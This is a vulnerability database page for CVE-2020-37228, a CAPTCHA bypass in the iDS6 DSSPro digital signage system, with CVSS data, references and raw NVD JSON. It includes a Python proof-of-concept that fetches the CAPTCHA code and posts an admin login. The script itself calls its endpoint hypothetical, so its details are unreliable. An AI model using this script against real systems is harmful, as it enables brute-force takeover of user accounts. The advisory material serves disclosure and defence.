CVE-2020-37228

Description

iDS6 DSSPro Digital Signage System 6.2 contains a CAPTCHA security bypass vulnerability that allows attackers to bypass authentication by requesting the autoLoginVerifyCode object. Attackers can retrieve valid CAPTCHA codes via the login endpoint and use them to perform brute-force attacks against user accounts.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

iDS6 DSSPro Digital Signage System 6.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

target_url = "http://target-ip/login"
# Hypothetical endpoint based on description
captcha_api = "http://target-ip/api/autoLoginVerifyCode"

def exploit():
    try:
        # Request the valid CAPTCHA code directly
        print("[*] Attempting to retrieve CAPTCHA...")
        response = requests.get(captcha_api)
        
        if response.status_code == 200:
            # Assuming the API returns the code directly in text or JSON
            captcha_code = response.text.strip() 
            print(f"[+] Retrieved CAPTCHA code: {captcha_code}")

            # Use the retrieved code to perform brute-force login
            payload = {
                "username": "admin",
                "password": "password123", # Replace with dictionary word
                "verifyCode": captcha_code
            }
            
            login_resp = requests.post(target_url, data=payload)
            
            if "Login successful" in login_resp.text or "dashboard" in login_resp.text:
                print("[+] Exploit successful! Authentication bypassed.")
            else:
                print("[-] Login failed. Credentials might be incorrect.")
        else:
            print(f"[-] Failed to contact CAPTCHA API. Status: {response.status_code}")
            
    except Exception as e:
        print(f"[!] An error occurred: {e}")

if __name__ == "__main__":
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-37228
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-37228
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-37228/
[4] VulDB https://vuldb.com/cve/CVE-2020-37228
[5] http://www.yerootech.com
[6] https://www.exploit-db.com/exploits/48991
[7] https://www.vulncheck.com/advisories/ids6-dsspro-digital-signage-system-captcha-security-bypass
[8] https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-37228", "sourceIdentifier": "[email protected]", "published": "2026-05-16T16:16:18.667", "lastModified": "2026-05-18T20:16:36.607", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "iDS6 DSSPro Digital Signage System 6.2 contains a CAPTCHA security bypass vulnerability that allows attackers to bypass authentication by requesting the autoLoginVerifyCode object. Attackers can retrieve valid CAPTCHA codes via the login endpoint and use them to perform brute-force attacks against user accounts."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "http://www.yerootech.com", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/48991", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ids6-dsspro-digital-signage-system-captcha-security-bypass", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5607.php", "source": "[email protected]"}]}}